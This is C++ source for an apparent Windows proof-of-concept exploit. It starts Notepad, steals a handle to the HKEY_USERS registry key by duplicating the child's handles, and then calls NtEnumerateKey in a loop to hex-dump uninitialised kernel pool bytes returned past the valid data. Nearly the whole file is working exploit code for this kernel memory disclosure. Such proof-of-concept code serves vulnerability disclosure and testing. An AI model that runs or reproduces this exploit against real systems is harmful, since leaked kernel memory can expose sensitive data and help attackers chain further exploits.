#define WIN32_NO_STATUS
#include <Windows.h>
#undef WIN32_NO_STATUS
#include <winternl.h>
#include <ntstatus.h>

#include <cstdio>
#include <cstdlib>

#pragma comment(lib, "ntdll")

#define ObjectNameInformation ((OBJECT_INFORMATION_CLASS)1)
#define KeyNodeInformation 1

extern "C" {

LONG NTAPI RtlCompareUnicodeString(
  PCUNICODE_STRING String1,
  PCUNICODE_STRING String2,
  BOOLEAN CaseInSensitive
);

NTSTATUS NTAPI NtEnumerateKey(
  HANDLE KeyHandle,
  ULONG Index,
  DWORD KeyInformationClass,
  PVOID KeyInformation,
  ULONG Length,
  PULONG ResultLength
);

}  // extern "C"

VOID PrintHex(PBYTE Data, ULONG dwBytes) {
  for (ULONG i = 0; i < dwBytes; i += 16) {
    printf("%.8x: ", i);

    for (ULONG j = 0; j < 16; j++) {
      if (i + j < dwBytes) {
        printf("%.2x ", Data[i + j]);
      } else {
        printf("?? ");
      }
    }

    for (ULONG j = 0; j < 16; j++) {
      if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
        printf("%c", Data[i + j]);
      } else {
        printf(".");
      }
    }

    printf("\n");
  }
}

int main() {
  BYTE NameBuffer[0x200];
  NTSTATUS Status;

  //
  // Create the Notepad process and wait for it to fully start.
  //

  STARTUPINFOW si;
  PROCESS_INFORMATION pi;

  memset(&si, 0, sizeof(si));
  memset(&pi, 0, sizeof(pi));

  si.cb = sizeof(si);
  si.dwFlags = STARTF_USESHOWWINDOW;
  si.wShowWindow = SW_MINIMIZE;

  BOOL bRet = CreateProcessW(L"C:\\Windows\\system32\\notepad.exe",
                             NULL,
                             NULL,
                             NULL,
                             FALSE,
                             0,
                             NULL,
                             NULL,
                             &si,
                             &pi);

  if (bRet) {
    CloseHandle(pi.hThread);
  } else {
    printf("CreateProcess failed with error %u\n", GetLastError());
    return 1;
  }

  Sleep(1000);

  //
  // Enumerate the subprocess handles in search of one that points to HKU.
  //

  UNICODE_STRING TargetKeyPath;
  RtlInitUnicodeString(&TargetKeyPath, L"\\Registry\\User");

  HKEY hKeyUsers = NULL;
  for (ULONG Handle = 4; Handle < 0x1000; Handle += 4) {
    HANDLE DuplicatedHandle;
    bRet = DuplicateHandle(pi.hProcess,
                           (HANDLE)Handle,
                           GetCurrentProcess(),
                           &DuplicatedHandle,
                           0,
                           FALSE,
                           DUPLICATE_SAME_ACCESS);

    ULONG ReturnLength;
    Status = NtQueryObject(DuplicatedHandle,
                           ObjectNameInformation,
                           NameBuffer,
                           sizeof(NameBuffer),
                           &ReturnLength);

    if (NT_SUCCESS(Status)) {
      PUNICODE_STRING Name = (PUNICODE_STRING)NameBuffer;

      if (!RtlCompareUnicodeString(Name, &TargetKeyPath, TRUE)) {
        hKeyUsers = (HKEY)DuplicatedHandle;
        break;
      }
    }

    CloseHandle(DuplicatedHandle);
  }

  if (hKeyUsers == NULL) {
    printf("Failed to find HKU\n");
    return 1;
  }

  //
  // Trigger the kernel pool memory disclosure.
  //

  for (int Index = 0;; Index++) {
    BYTE KeyNodeBuffer[0x100] = { /* zero */ };
    ULONG ResultLength;
    Status = NtEnumerateKey(hKeyUsers,
                            Index,
                            KeyNodeInformation,
                            KeyNodeBuffer,
                            sizeof(KeyNodeBuffer),
                            &ResultLength);

    if (!NT_SUCCESS(Status)) {
      break;
    }

    BOOL bIsNonzeroData = FALSE;
    for (ULONG i = ResultLength; i < sizeof(KeyNodeBuffer); i++) {
      if (KeyNodeBuffer[i] != 0) {
        bIsNonzeroData = TRUE;
        break;
      }
    }

    if (bIsNonzeroData) {
      printf("Leaked data:\n");
      PrintHex(&KeyNodeBuffer[ResultLength],
               sizeof(KeyNodeBuffer) - ResultLength);
    }
  }

  RegCloseKey(hKeyUsers);
  TerminateProcess(pi.hProcess, 0);
  CloseHandle(pi.hProcess);

  return 0;
}
